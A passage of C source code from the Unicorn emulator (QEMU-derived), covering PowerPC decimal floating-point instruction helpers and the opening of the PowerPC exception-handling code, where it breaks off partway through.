DFP_HELPER_TSTDG(dtstdgq, 128) #define DFP_HELPER_TSTEX(op, size) \ uint32_t helper_##op(CPUPPCState *env, ppc_fprp_t *a, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ int expa, expb, a_is_special, b_is_special; \ \ dfp_prepare_decimal##size(&dfp, a, b, env); \ \ expa = dfp.a.exponent; \ expb = dfp.b.exponent; \ a_is_special = decNumberIsSpecial(&dfp.a); \ b_is_special = decNumberIsSpecial(&dfp.b); \ \ if (a_is_special || b_is_special) { \ int atype = a_is_special ? (decNumberIsNaN(&dfp.a) ? 4 : 2) : 1; \ int btype = b_is_special ? (decNumberIsNaN(&dfp.b) ? 4 : 2) : 1; \ dfp.crbf = (atype ^ btype) ? 0x1 : 0x2; \ } else if (expa < expb) { \ dfp.crbf = 0x8; \ } else if (expa > expb) { \ dfp.crbf = 0x4; \ } else { \ dfp.crbf = 0x2; \ } \ \ dfp_set_FPCC_from_CRBF(&dfp); \ return dfp.crbf; \ } DFP_HELPER_TSTEX(dtstex, 64) DFP_HELPER_TSTEX(dtstexq, 128) #define DFP_HELPER_TSTSF(op, size) \ uint32_t helper_##op(CPUPPCState *env, ppc_fprp_t *a, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ unsigned k; \ ppc_vsr_t va; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ get_dfp64(&va, a); \ k = va.VsrD(1) & 0x3F; \ \ if (unlikely(decNumberIsSpecial(&dfp.b))) { \ dfp.crbf = 1; \ } else if (k == 0) { \ dfp.crbf = 4; \ } else if (unlikely(decNumberIsZero(&dfp.b))) { \ /* Zero has no sig digits */ \ dfp.crbf = 4; \ } else { \ unsigned nsd = dfp.b.digits; \ if (k < nsd) { \ dfp.crbf = 8; \ } else if (k > nsd) { \ dfp.crbf = 4; \ } else { \ dfp.crbf = 2; \ } \ } \ \ dfp_set_FPCC_from_CRBF(&dfp); \ return dfp.crbf; \ } DFP_HELPER_TSTSF(dtstsf, 64) DFP_HELPER_TSTSF(dtstsfq, 128) #define DFP_HELPER_TSTSFI(op, size) \ uint32_t helper_##op(CPUPPCState *env, uint32_t a, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ unsigned uim; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ uim = a & 0x3F; \ \ if (unlikely(decNumberIsSpecial(&dfp.b))) { \ dfp.crbf = 1; \ } else if (uim == 0) { \ dfp.crbf = 4; \ } else if (unlikely(decNumberIsZero(&dfp.b))) { \ /* Zero has no sig digits */ \ dfp.crbf = 4; \ } else { \ unsigned nsd = dfp.b.digits; \ if (uim < nsd) { \ dfp.crbf = 8; \ } else if (uim > nsd) { \ dfp.crbf = 4; \ } else { \ dfp.crbf = 2; \ } \ } \ \ dfp_set_FPCC_from_CRBF(&dfp); \ return dfp.crbf; \ } DFP_HELPER_TSTSFI(dtstsfi, 64) DFP_HELPER_TSTSFI(dtstsfiq, 128) static void QUA_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_XX(dfp); dfp_check_for_VXSNAN(dfp); dfp_check_for_VXCVI(dfp); } static void dfp_quantize(uint8_t rmc, struct PPC_DFP *dfp) { dfp_set_round_mode_from_immediate(0, rmc, dfp); decNumberQuantize(&dfp->t, &dfp->b, &dfp->a, &dfp->context); if (decNumberIsSNaN(&dfp->a)) { dfp->t = dfp->a; dfp_makeQNaN(&dfp->t); } else if (decNumberIsSNaN(&dfp->b)) { dfp->t = dfp->b; dfp_makeQNaN(&dfp->t); } else if (decNumberIsQNaN(&dfp->a)) { dfp->t = dfp->a; } else if (decNumberIsQNaN(&dfp->b)) { dfp->t = dfp->b; } } #define DFP_HELPER_QUAI(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b, \ uint32_t te, uint32_t rmc) \ { \ struct PPC_DFP dfp; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ decNumberFromUInt32(&dfp.a, 1); \ dfp.a.exponent = (int32_t)((int8_t)(te << 3) >> 3); \ \ dfp_quantize(rmc, &dfp); \ dfp_finalize_decimal##size(&dfp); \ QUA_PPs(&dfp); \ \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_QUAI(dquai, 64) DFP_HELPER_QUAI(dquaiq, 128) #define DFP_HELPER_QUA(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *a, \ ppc_fprp_t *b, uint32_t rmc) \ { \ struct PPC_DFP dfp; \ \ dfp_prepare_decimal##size(&dfp, a, b, env); \ \ dfp_quantize(rmc, &dfp); \ dfp_finalize_decimal##size(&dfp); \ QUA_PPs(&dfp); \ \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_QUA(dqua, 64) DFP_HELPER_QUA(dquaq, 128) static void _dfp_reround(uint8_t rmc, int32_t ref_sig, int32_t xmax, struct PPC_DFP *dfp) { int msd_orig, msd_rslt; if (unlikely((ref_sig == 0) || (dfp->b.digits <= ref_sig))) { dfp->t = dfp->b; if (decNumberIsSNaN(&dfp->b)) { dfp_makeQNaN(&dfp->t); dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXSNAN, FPSCR_VE); } return; } /* Reround is equivalent to quantizing b with 1**E(n) where */ /* n = exp(b) + numDigits(b) - reference_significance. */ decNumberFromUInt32(&dfp->a, 1); dfp->a.exponent = dfp->b.exponent + dfp->b.digits - ref_sig; if (unlikely(dfp->a.exponent > xmax)) { dfp->t.digits = 0; dfp->t.bits &= ~DECNEG; dfp_makeQNaN(&dfp->t); dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXCVI, FPSCR_VE); return; } dfp_quantize(rmc, dfp); msd_orig = dfp_get_digit(&dfp->b, dfp->b.digits-1); msd_rslt = dfp_get_digit(&dfp->t, dfp->t.digits-1); /* If the quantization resulted in rounding up to the next magnitude, */ /* then we need to shift the significand and adjust the exponent. */ if (unlikely((msd_orig == 9) && (msd_rslt == 1))) { decNumber negone; decNumberFromInt32(&negone, -1); decNumberShift(&dfp->t, &dfp->t, &negone, &dfp->context); dfp->t.exponent++; if (unlikely(dfp->t.exponent > xmax)) { dfp_makeQNaN(&dfp->t); dfp->t.digits = 0; dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXCVI, FP_VE); /* Inhibit XX in this case */ decContextClearStatus(&dfp->context, DEC_Inexact); } } } #define DFP_HELPER_RRND(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *a, \ ppc_fprp_t *b, uint32_t rmc) \ { \ struct PPC_DFP dfp; \ ppc_vsr_t va; \ int32_t ref_sig; \ int32_t xmax = ((size) == 64) ? 369 : 6111; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ get_dfp64(&va, a); \ ref_sig = va.VsrD(1) & 0x3f; \ \ _dfp_reround(rmc, ref_sig, xmax, &dfp); \ dfp_finalize_decimal##size(&dfp); \ QUA_PPs(&dfp); \ \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_RRND(drrnd, 64) DFP_HELPER_RRND(drrndq, 128) #define DFP_HELPER_RINT(op, postprocs, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b, \ uint32_t r, uint32_t rmc) \ { \ struct PPC_DFP dfp; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ dfp_set_round_mode_from_immediate(r, rmc, &dfp); \ decNumberToIntegralExact(&dfp.t, &dfp.b, &dfp.context); \ dfp_finalize_decimal##size(&dfp); \ postprocs(&dfp); \ \ set_dfp##size(t, &dfp.vt); \ } static void RINTX_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_XX(dfp); dfp_check_for_VXSNAN(dfp); } DFP_HELPER_RINT(drintx, RINTX_PPs, 64) DFP_HELPER_RINT(drintxq, RINTX_PPs, 128) static void RINTN_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_VXSNAN(dfp); } DFP_HELPER_RINT(drintn, RINTN_PPs, 64) DFP_HELPER_RINT(drintnq, RINTN_PPs, 128) void helper_dctdp(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) { struct PPC_DFP dfp; ppc_vsr_t vb; uint32_t b_short; get_dfp64(&vb, b); b_short = (uint32_t)vb.VsrD(1); dfp_prepare_decimal64(&dfp, 0, 0, env); decimal32ToNumber((decimal32 *)&b_short, &dfp.t); dfp_finalize_decimal64(&dfp); set_dfp64(t, &dfp.vt); dfp_set_FPRF_from_FRT(&dfp); } void helper_dctqpq(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) { struct PPC_DFP dfp; ppc_vsr_t vb; dfp_prepare_decimal128(&dfp, 0, 0, env); get_dfp64(&vb, b); decimal64ToNumber((decimal64 *)&vb.VsrD(1), &dfp.t); dfp_check_for_VXSNAN_and_convert_to_QNaN(&dfp); dfp_set_FPRF_from_FRT(&dfp); dfp_finalize_decimal128(&dfp); set_dfp128(t, &dfp.vt); } void helper_drsp(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) { struct PPC_DFP dfp; uint32_t t_short = 0; ppc_vsr_t vt; dfp_prepare_decimal64(&dfp, 0, b, env); decimal32FromNumber((decimal32 *)&t_short, &dfp.b, &dfp.context); decimal32ToNumber((decimal32 *)&t_short, &dfp.t); dfp_set_FPRF_from_FRT_short(&dfp); dfp_check_for_OX(&dfp); dfp_check_for_UX(&dfp); dfp_check_for_XX(&dfp); vt.VsrD(1) = (uint64_t)t_short; set_dfp64(t, &vt); } void helper_drdpq(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) { struct PPC_DFP dfp; dfp_prepare_decimal128(&dfp, 0, b, env); decimal64FromNumber((decimal64 *)&dfp.vt.VsrD(1), &dfp.b, &dfp.context); decimal64ToNumber((decimal64 *)&dfp.vt.VsrD(1), &dfp.t); dfp_check_for_VXSNAN_and_convert_to_QNaN(&dfp); dfp_set_FPRF_from_FRT_long(&dfp); dfp_check_for_OX(&dfp); dfp_check_for_UX(&dfp); dfp_check_for_XX(&dfp); dfp.vt.VsrD(0) = dfp.vt.VsrD(1) = 0; dfp_finalize_decimal64(&dfp); set_dfp128(t, &dfp.vt); } #define DFP_HELPER_CFFIX(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ ppc_vsr_t vb; \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ get_dfp64(&vb, b); \ decNumberFromInt64(&dfp.t, (int64_t)vb.VsrD(1)); \ dfp_finalize_decimal##size(&dfp); \ CFFIX_PPs(&dfp); \ \ set_dfp##size(t, &dfp.vt); \ } static void CFFIX_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_XX(dfp); } DFP_HELPER_CFFIX(dcffix, 64) DFP_HELPER_CFFIX(dcffixq, 128) #define DFP_HELPER_CTFIX(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ if (unlikely(decNumberIsSpecial(&dfp.b))) { \ uint64_t invalid_flags = FP_VX | FP_VXCVI; \ if (decNumberIsInfinite(&dfp.b)) { \ dfp.vt.VsrD(1) = decNumberIsNegative(&dfp.b) ? INT64_MIN : \ INT64_MAX; \ } else { /* NaN */ \ dfp.vt.VsrD(1) = INT64_MIN; \ if (decNumberIsSNaN(&dfp.b)) { \ invalid_flags |= FP_VXSNAN; \ } \ } \ dfp_set_FPSCR_flag(&dfp, invalid_flags, FP_VE); \ } else if (unlikely(decNumberIsZero(&dfp.b))) { \ dfp.vt.VsrD(1) = 0; \ } else { \ decNumberToIntegralExact(&dfp.b, &dfp.b, &dfp.context); \ dfp.vt.VsrD(1) = decNumberIntegralToInt64(&dfp.b, &dfp.context); \ if (decContextTestStatus(&dfp.context, DEC_Invalid_operation)) { \ dfp.vt.VsrD(1) = decNumberIsNegative(&dfp.b) ? INT64_MIN : \ INT64_MAX; \ dfp_set_FPSCR_flag(&dfp, FP_VX | FP_VXCVI, FP_VE); \ } else { \ dfp_check_for_XX(&dfp); \ } \ } \ \ set_dfp64(t, &dfp.vt); \ } DFP_HELPER_CTFIX(dctfix, 64) DFP_HELPER_CTFIX(dctfixq, 128) static inline void dfp_set_bcd_digit_64(ppc_vsr_t *t, uint8_t digit, unsigned n) { t->VsrD(1) |= ((uint64_t)(digit & 0xF) << (n << 2)); } static inline void dfp_set_bcd_digit_128(ppc_vsr_t *t, uint8_t digit, unsigned n) { t->VsrD((n & 0x10) ? 0 : 1) |= ((uint64_t)(digit & 0xF) << ((n & 15) << 2)); } static inline void dfp_set_sign_64(ppc_vsr_t *t, uint8_t sgn) { t->VsrD(1) <<= 4; t->VsrD(1) |= (sgn & 0xF); } static inline void dfp_set_sign_128(ppc_vsr_t *t, uint8_t sgn) { t->VsrD(0) <<= 4; t->VsrD(0) |= (t->VsrD(1) >> 60); t->VsrD(1) <<= 4; t->VsrD(1) |= (sgn & 0xF); } #define DFP_HELPER_DEDPD(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b, \ uint32_t sp) \ { \ struct PPC_DFP dfp; \ uint8_t digits[34]; \ int i, N; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ decNumberGetBCD(&dfp.b, digits); \ dfp.vt.VsrD(0) = dfp.vt.VsrD(1) = 0; \ N = dfp.b.digits; \ \ for (i = 0; (i < N) && (i < (size)/4); i++) { \ dfp_set_bcd_digit_##size(&dfp.vt, digits[N - i - 1], i); \ } \ \ if (sp & 2) { \ uint8_t sgn; \ \ if (decNumberIsNegative(&dfp.b)) { \ sgn = 0xD; \ } else { \ sgn = ((sp & 1) ? 0xF : 0xC); \ } \ dfp_set_sign_##size(&dfp.vt, sgn); \ } \ \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_DEDPD(ddedpd, 64) DFP_HELPER_DEDPD(ddedpdq, 128) static inline uint8_t dfp_get_bcd_digit_64(ppc_vsr_t *t, unsigned n) { return t->VsrD(1) >> ((n << 2) & 63) & 15; } static inline uint8_t dfp_get_bcd_digit_128(ppc_vsr_t *t, unsigned n) { return t->VsrD((n & 0x10) ? 0 : 1) >> ((n << 2) & 63) & 15; } #define DFP_HELPER_ENBCD(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b, \ uint32_t s) \ { \ struct PPC_DFP dfp; \ uint8_t digits[32]; \ int n = 0, offset = 0, sgn = 0, nonzero = 0; \ \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ decNumberZero(&dfp.t); \ \ if (s) { \ uint8_t sgnNibble = dfp_get_bcd_digit_##size(&dfp.vb, offset++); \ switch (sgnNibble) { \ case 0xD: \ case 0xB: \ sgn = 1; \ break; \ case 0xC: \ case 0xF: \ case 0xA: \ case 0xE: \ sgn = 0; \ break; \ default: \ dfp_set_FPSCR_flag(&dfp, FP_VX | FP_VXCVI, FPSCR_VE); \ return; \ } \ } \ \ while (offset < (size) / 4) { \ n++; \ digits[(size) / 4 - n] = dfp_get_bcd_digit_##size(&dfp.vb, \ offset++); \ if (digits[(size) / 4 - n] > 10) { \ dfp_set_FPSCR_flag(&dfp, FP_VX | FP_VXCVI, FPSCR_VE); \ return; \ } else { \ nonzero |= (digits[(size) / 4 - n] > 0); \ } \ } \ \ if (nonzero) { \ decNumberSetBCD(&dfp.t, digits + ((size) / 4) - n, n); \ } \ \ if (s && sgn) { \ dfp.t.bits |= DECNEG; \ } \ dfp_finalize_decimal##size(&dfp); \ dfp_set_FPRF_from_FRT(&dfp); \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_ENBCD(denbcd, 64) DFP_HELPER_ENBCD(denbcdq, 128) #define DFP_HELPER_XEX(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ ppc_vsr_t vt; \ \ memset(&dfp, 0, sizeof(dfp)); \ memset(&vt, 0, sizeof(vt)); \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ if (unlikely(decNumberIsSpecial(&dfp.b))) { \ if (decNumberIsInfinite(&dfp.b)) { \ vt.VsrD(1) = -1; \ } else if (decNumberIsSNaN(&dfp.b)) { \ vt.VsrD(1) = -3; \ } else if (decNumberIsQNaN(&dfp.b)) { \ vt.VsrD(1) = -2; \ } else { \ assert(0); \ } \ set_dfp64(t, &vt); \ } else { \ if ((size) == 64) { \ vt.VsrD(1) = dfp.b.exponent + 398; \ } else if ((size) == 128) { \ vt.VsrD(1) = dfp.b.exponent + 6176; \ } else { \ assert(0); \ } \ set_dfp64(t, &vt); \ } \ } DFP_HELPER_XEX(dxex, 64) DFP_HELPER_XEX(dxexq, 128) static void dfp_set_raw_exp_64(ppc_vsr_t *t, uint64_t raw) { t->VsrD(1) &= 0x8003ffffffffffffULL; t->VsrD(1) |= (raw << (63 - 13)); } static void dfp_set_raw_exp_128(ppc_vsr_t *t, uint64_t raw) { t->VsrD(0) &= 0x80003fffffffffffULL; t->VsrD(0) |= (raw << (63 - 17)); } #define DFP_HELPER_IEX(op, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *a, \ ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ uint64_t raw_qnan, raw_snan, raw_inf, max_exp; \ ppc_vsr_t va; \ int bias; \ int64_t exp; \ \ get_dfp64(&va, a); \ exp = (int64_t)va.VsrD(1); \ dfp_prepare_decimal##size(&dfp, 0, b, env); \ \ if ((size) == 64) { \ max_exp = 767; \ raw_qnan = 0x1F00; \ raw_snan = 0x1F80; \ raw_inf = 0x1E00; \ bias = 398; \ } else if ((size) == 128) { \ max_exp = 12287; \ raw_qnan = 0x1f000; \ raw_snan = 0x1f800; \ raw_inf = 0x1e000; \ bias = 6176; \ } else { \ assert(0); \ } \ \ if (unlikely((exp < 0) || (exp > max_exp))) { \ dfp.vt.VsrD(0) = dfp.vb.VsrD(0); \ dfp.vt.VsrD(1) = dfp.vb.VsrD(1); \ if (exp == -1) { \ dfp_set_raw_exp_##size(&dfp.vt, raw_inf); \ } else if (exp == -3) { \ dfp_set_raw_exp_##size(&dfp.vt, raw_snan); \ } else { \ dfp_set_raw_exp_##size(&dfp.vt, raw_qnan); \ } \ } else { \ dfp.t = dfp.b; \ if (unlikely(decNumberIsSpecial(&dfp.t))) { \ dfp.t.bits &= ~DECSPECIAL; \ } \ dfp.t.exponent = exp - bias; \ dfp_finalize_decimal##size(&dfp); \ } \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_IEX(diex, 64) DFP_HELPER_IEX(diexq, 128) static void dfp_clear_lmd_from_g5msb(uint64_t *t) { /* The most significant 5 bits of the PowerPC DFP format combine bits */ /* from the left-most decimal digit (LMD) and the biased exponent. */ /* This routine clears the LMD bits while preserving the exponent */ /* bits. See "Figure 80: Encoding of bits 0:4 of the G field for */ /* Finite Numbers" in the Power ISA for additional details. */ uint64_t g5msb = (*t >> 58) & 0x1F; if ((g5msb >> 3) < 3) { /* LMD in [0-7] ? */ *t &= ~(7ULL << 58); } else { switch (g5msb & 7) { case 0: case 1: g5msb = 0; break; case 2: case 3: g5msb = 0x8; break; case 4: case 5: g5msb = 0x10; break; case 6: g5msb = 0x1E; break; case 7: g5msb = 0x1F; break; } *t &= ~(0x1fULL << 58); *t |= (g5msb << 58); } } #define DFP_HELPER_SHIFT(op, size, shift_left) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *a, \ uint32_t sh) \ { \ struct PPC_DFP dfp; \ unsigned max_digits = ((size) == 64) ? 16 : 34; \ \ dfp_prepare_decimal##size(&dfp, a, 0, env); \ \ if (sh <= max_digits) { \ \ decNumber shd; \ unsigned special = dfp.a.bits & DECSPECIAL; \ \ if (shift_left) { \ decNumberFromUInt32(&shd, sh); \ } else { \ decNumberFromInt32(&shd, -((int32_t)sh)); \ } \ \ dfp.a.bits &= ~DECSPECIAL; \ decNumberShift(&dfp.t, &dfp.a, &shd, &dfp.context); \ \ dfp.t.bits |= special; \ if (special && (dfp.t.digits >= max_digits)) { \ dfp.t.digits = max_digits - 1; \ } \ \ dfp_finalize_decimal##size(&dfp); \ } else { \ if ((size) == 64) { \ dfp.vt.VsrD(1) = dfp.va.VsrD(1) & \ 0xFFFC000000000000ULL; \ dfp_clear_lmd_from_g5msb(&dfp.vt.VsrD(1)); \ } else { \ dfp.vt.VsrD(0) = dfp.va.VsrD(0) & \ 0xFFFFC00000000000ULL; \ dfp_clear_lmd_from_g5msb(&dfp.vt.VsrD(0)); \ dfp.vt.VsrD(1) = 0; \ } \ } \ \ set_dfp##size(t, &dfp.vt); \ } DFP_HELPER_SHIFT(dscli, 64, 1) DFP_HELPER_SHIFT(dscliq, 128, 1) DFP_HELPER_SHIFT(dscri, 64, 0) DFP_HELPER_SHIFT(dscriq, 128, 0) �����������������unicorn-2.1.1/qemu/target/ppc/excp_helper.c���������������������������������������������������������0000664�0000000�0000000�00000127153�14675241067�0020676�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC exception emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "internal.h" #include "helper_regs.h" /* #define DEBUG_OP */ /* #define DEBUG_SOFTWARE_TLB */ /* #define DEBUG_EXCEPTIONS */ #ifdef DEBUG_EXCEPTIONS # define LOG_EXCP(...) qemu_log(__VA_ARGS__) #else # define LOG_EXCP(...) do { } while (0) #endif /*****************************************************************************/ /* Exception processing */ static inline void dump_syscall(CPUPPCState *env) { qemu_log_mask(CPU_LOG_INT, "syscall r0=%016" PRIx64 " r3=%016" PRIx64 " r4=%016" PRIx64 " r5=%016" PRIx64 " r6=%016" PRIx64 " nip=" TARGET_FMT_lx "\n", ppc_dump_gpr(env, 0), ppc_dump_gpr(env, 3), ppc_dump_gpr(env, 4), ppc_dump_gpr(env, 5), ppc_dump_gpr(env, 6), env->nip); } static int powerpc_reset_wakeup(CPUState *cs, CPUPPCState *env, int excp, target_ulong *msr) { /* We no longer are in a PM state */ env->resume_as_sreset = false; /* Pretend to be returning from doze always as we don't lose state */ *msr |= (0x1ull << (63 - 47)); /* Machine checks are sent normally */ if (excp == POWERPC_EXCP_MCHECK) { return excp; } switch (excp) { case POWERPC_EXCP_RESET: *msr |= 0x4ull << (63 - 45); break; case POWERPC_EXCP_EXTERNAL: *msr |= 0x8ull << (63 - 45); break; case POWERPC_EXCP_DECR: *msr |= 0x6ull << (63 - 45); break; case POWERPC_EXCP_SDOOR: *msr |= 0x5ull << (63 - 45); break; case POWERPC_EXCP_SDOOR_HV: *msr |= 0x3ull << (63 - 45); break; case POWERPC_EXCP_HV_MAINT: *msr |= 0xaull << (63 - 45); break; case POWERPC_EXCP_HVIRT: *msr |= 0x9ull << (63 - 45); break; default: cpu_abort(cs, "Unsupported exception %d in Power Save mode\n", excp); } return POWERPC_EXCP_RESET; } static uint64_t ppc_excp_vector_offset(CPUState *cs, int ail) { uint64_t offset = 0; switch (ail) { case AIL_NONE: break; case AIL_0001_8000: offset = 0x18000; break; case AIL_C000_0000_0000_4000: offset = 0xc000000000004000ull; break; default: cpu_abort(cs, "Invalid AIL combination %d\n", ail); break; } return offset; } static inline void powerpc_set_excp_state(PowerPCCPU *cpu, target_ulong vector, target_ulong msr) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; /* * We don't use hreg_store_msr here as already have treated any * special case that could occur. Just store MSR and update hflags * * Note: We *MUST* not use hreg_store_msr() as-is anyway because it * will prevent setting of the HV bit which some exceptions might need * to do. */ env->msr = msr & env->msr_mask; hreg_compute_hflags(env); env->nip = vector; /* Reset exception state */ cs->exception_index = POWERPC_EXCP_NONE; env->error_code = 0; /* Reset the reservation */ env->reserve_addr = -1; /* * Any interrupt is context synchronizing, check if TCG TLB needs * a delayed flush on ppc64 */ check_tlb_flush(env, false); } /* * Note that this function should be greatly optimized when called * with a constant excp, from ppc_hw_interrupt */ static inline void powerpc_excp(PowerPCCPU *cpu, int excp_model, int excp) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; target_ulong msr, new_msr, vector; int srr0, srr1, asrr0, asrr1, lev, ail; bool lpes0; qemu_log_mask(CPU_LOG_INT, "Raise exception at " TARGET_FMT_lx " => %08x (%02x)\n", env->nip, excp, env->error_code); /* new srr1 value excluding must-be-zero bits */ if (excp_model == POWERPC_EXCP_BOOKE) { msr = env->msr; } else { msr = env->msr & ~0x783f0000ULL; } /* * new interrupt handler msr preserves existing HV and ME unless * explicitly overriden */ new_msr = env->msr & (((target_ulong)1 << MSR_ME) | MSR_HVB); /* target registers */ srr0 = SPR_SRR0; srr1 = SPR_SRR1; asrr0 = -1; asrr1 = -1; /* * check for special resume at 0x100 from doze/nap/sleep/winkle on * P7/P8/P9 */ if (env->resume_as_sreset) { excp = powerpc_reset_wakeup(cs, env, excp, &msr); } /* * Exception targetting modifiers * * LPES0 is supported on POWER7/8/9 * LPES1 is not supported (old iSeries mode) * * On anything else, we behave as if LPES0 is 1 * (externals don't alter MSR:HV) * * AIL is initialized here but can be cleared by * selected exceptions */ #if defined(TARGET_PPC64) if (excp_model == POWERPC_EXCP_POWER7 || excp_model == POWERPC_EXCP_POWER8 || excp_model == POWERPC_EXCP_POWER9) { lpes0 = !!(env->spr[SPR_LPCR] & LPCR_LPES0); if (excp_model != POWERPC_EXCP_POWER7) { ail = (env->spr[SPR_LPCR] & LPCR_AIL) >> LPCR_AIL_SHIFT; } else { ail = 0; } } else #endif /* defined(TARGET_PPC64) */ { lpes0 = true; ail = 0; } /* * Hypervisor emulation assistance interrupt only exists on server * arch 2.05 server or later. We also don't want to generate it if * we don't have HVB in msr_mask (PAPR mode). */ if (excp == POWERPC_EXCP_HV_EMU #if defined(TARGET_PPC64) && !((env->mmu_model & POWERPC_MMU_64) && (env->msr_mask & MSR_HVB)) #endif /* defined(TARGET_PPC64) */ ) { excp = POWERPC_EXCP_PROGRAM; } switch (excp) { case POWERPC_EXCP_NONE: /* Should never happen */ return; case POWERPC_EXCP_CRITICAL: /* Critical input */ switch (excp_model) { case POWERPC_EXCP_40x: srr0 = SPR_40x_SRR2; srr1 = SPR_40x_SRR3; break; case POWERPC_EXCP_BOOKE: srr0 = SPR_BOOKE_CSRR0; srr1 = SPR_BOOKE_CSRR1; break; case POWERPC_EXCP_G2: break; default: goto excp_invalid; } break; case POWERPC_EXCP_MCHECK: /* Machine check exception */ if (msr_me == 0) { /* * Machine check exception is not enabled. Enter * checkstop state. */ fprintf(stderr, "Machine check while not allowed. " "Entering checkstop state\n"); #if 0 if (qemu_log_separate()) { qemu_log("Machine check while not allowed. " "Entering checkstop state\n"); } #endif cs->halted = 1; cpu_interrupt_exittb(cs); } if (env->msr_mask & MSR_HVB) { /* * ISA specifies HV, but can be delivered to guest with HV * clear (e.g., see FWNMI in PAPR). */ new_msr |= (target_ulong)MSR_HVB; } ail = 0; /* machine check exceptions don't have ME set */ new_msr &= ~((target_ulong)1 << MSR_ME); /* XXX: should also have something loaded in DAR / DSISR */ switch (excp_model) { case POWERPC_EXCP_40x: srr0 = SPR_40x_SRR2; srr1 = SPR_40x_SRR3; break; case POWERPC_EXCP_BOOKE: /* FIXME: choose one or the other based on CPU type */ srr0 = SPR_BOOKE_MCSRR0; srr1 = SPR_BOOKE_MCSRR1; asrr0 = SPR_BOOKE_CSRR0; asrr1 = SPR_BOOKE_CSRR1; break; default: break; } break; case POWERPC_EXCP_DSI: /* Data storage exception */ LOG_EXCP("DSI exception: DSISR=" TARGET_FMT_lx" DAR=" TARGET_FMT_lx "\n", env->spr[SPR_DSISR], env->spr[SPR_DAR]); break; case POWERPC_EXCP_ISI: /* Instruction storage exception */ LOG_EXCP("ISI exception: msr=" TARGET_FMT_lx ", nip=" TARGET_FMT_lx "\n", msr, env->nip); msr |= env->error_code; break; case POWERPC_EXCP_EXTERNAL: /* External input */ cs = CPU(cpu); if (!lpes0) { new_msr |= (target_ulong)MSR_HVB; new_msr |= env->msr & ((target_ulong)1 << MSR_RI); srr0 = SPR_HSRR0; srr1 = SPR_HSRR1; } if (env->mpic_proxy) { /* IACK the IRQ on delivery */ #ifdef UNICORN_ARCH_POSTFIX env->spr[SPR_BOOKE_EPR] = glue(ldl_phys, UNICORN_ARCH_POSTFIX)(cs->uc, cs->as, env->mpic_iack); #else env->spr[SPR_BOOKE_EPR] = ldl_phys(cs->uc, cs->as, env->mpic_iack); #endif } break; case POWERPC_EXCP_ALIGN: /* Alignment exception */ /* Get rS/rD and rA from faulting opcode */ /* * Note: the opcode fields will not be set properly for a * direct store load/store, but nobody cares as nobody * actually uses direct store segments. */ env->spr[SPR_DSISR] |= (env->error_code & 0x03FF0000) >> 16; break; case POWERPC_EXCP_PROGRAM: /* Program exception */ switch (env->error_code & ~0xF) { case 